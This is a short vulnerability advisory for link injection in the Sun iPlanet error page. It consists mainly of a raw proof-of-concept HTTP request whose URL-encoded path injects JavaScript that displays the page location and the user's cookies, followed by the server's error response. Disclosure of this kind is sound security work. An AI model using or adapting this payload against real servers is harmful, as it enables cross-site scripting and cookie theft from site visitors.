Sun iPlanet Error Page Link Injection

2012.07.01
Credit: BugsNotHugs
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

known about long time, but no CVE! probably because this really lame vulnerability! some security pro will say this good for social engineering and give cyberwar example! GET /%27%29%3b%61%6c%65%72%74%28%27%58%53%53%5c%72%5c%72%27%2b%27%4c%6f%63%61%74%69%6f%6e%3a%20%27%2b%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2b%27%5c%72%43%6f%6f%6b%69%65%3a%20%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%2f%2f%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://exploit-db.com/ Accept-Language: en-us Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4321; InfoPath.2; .NET CLR 2.0.50737) Host: target.server Cache-Control: no-cache Cookie: ARPT=MyCoOkIe Connection: close <HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD> <H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it. Please inform the site administrator of the <A HREF="https://exploit-db/";>referring page</A>.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top